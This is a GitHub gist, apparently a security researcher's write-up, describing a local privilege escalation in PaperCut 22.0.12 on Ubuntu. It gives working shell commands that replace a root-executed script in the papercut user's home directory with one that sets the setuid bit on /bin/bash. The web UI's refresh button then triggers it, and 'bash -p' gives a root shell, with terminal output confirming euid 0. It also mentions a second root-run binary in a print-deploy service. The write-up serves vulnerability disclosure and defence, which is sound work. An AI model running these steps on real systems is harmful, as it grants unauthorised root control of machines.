Skip to content

Instantly share code, notes, and snippets.


xct/ Secret

Last active December 4, 2023 07:46
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save xct/b2c2aef2ceb967c6b6dbaac325698af1 to your computer and use it in GitHub Desktop.
Save xct/b2c2aef2ceb967c6b6dbaac325698af1 to your computer and use it in GitHub Desktop.
Papercut Privilege Escalation

Papercut Privilege Escalation


We download the latest version 22.0.12 / Build 66453 from the website ( and install it as a low privileged user called "papercut" on Ubuntu 22.04. On installation we choose "su" method and provide the root password.


Assume we have access to this low privileged "papercut" user as an attacker, for example via ssh or another vulnerability and we can also access the web application on port 9191. We go to while logged in as application admin and then follow the assistant on the right side of the screen. We now end up on the "Mobility Print: Import Printers" screen. There we enter anything in the search field and press refresh servers. This will run /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key on the machine as root. As this file is in the directory of the papercut user, we can replace it with any binary or shell script we want.

To execute the attack, run the following commands as the low privileged "papercut" user:

papercut@research:~$ ls -lah /home/papercut/server/bin/linux-x64/
drwxr-xr-x 3 papercut papercut 4,0K Mai 26 13:03 .
drwx------ 3 papercut papercut 4,0K Mai 26 13:03 ..
-rwxr-xr-x 1 papercut papercut  493 Mai 12 08:45 server-command
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd
# A wrapper for server-command

. `dirname $0`/.common

${JRE_HOME}/bin/java \${TMP_DIR} \
        -Dserver.home=${SERVER_HOME} \
        -Djava.awt.headless=true \
        -Djava.locale.providers=COMPAT,SPI \
        -Dlog4j.configurationFile=file:${SERVER_HOME}/lib/ \
        -Xverify:none \
	biz.papercut.pcng.server.ServerCommand \

papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak
papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command

papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
chmod u+s /bin/bash

Now the script has been replaced and will set the setuid bit on bash when we hit the refresh button. Note that we can do that because the file is in our home directory and is owned by the papercut user (but executed as root).

Confirm root privileges:

papercut@research:~$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1,4M Jan  6  2022 /bin/bash
papercut@research:~$ bash -p
bash-5.1# id
uid=1001(papercut) gid=1001(papercut) euid=0(root) groups=1001(papercut)

Additional Vulnerabilities

Besides the example above, there also other similar issues with executing binaries in the papercut home folder as root. For example the print deploy service is running another binary as root from the low privileged users home folder:

papercut@research:~$ cat /etc/systemd/system/
Description=Automatically deploys printers through a server configuration




Here the binary can also be replaced similar to the above - but it requires a restart to trigger it. Other services are also affected.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment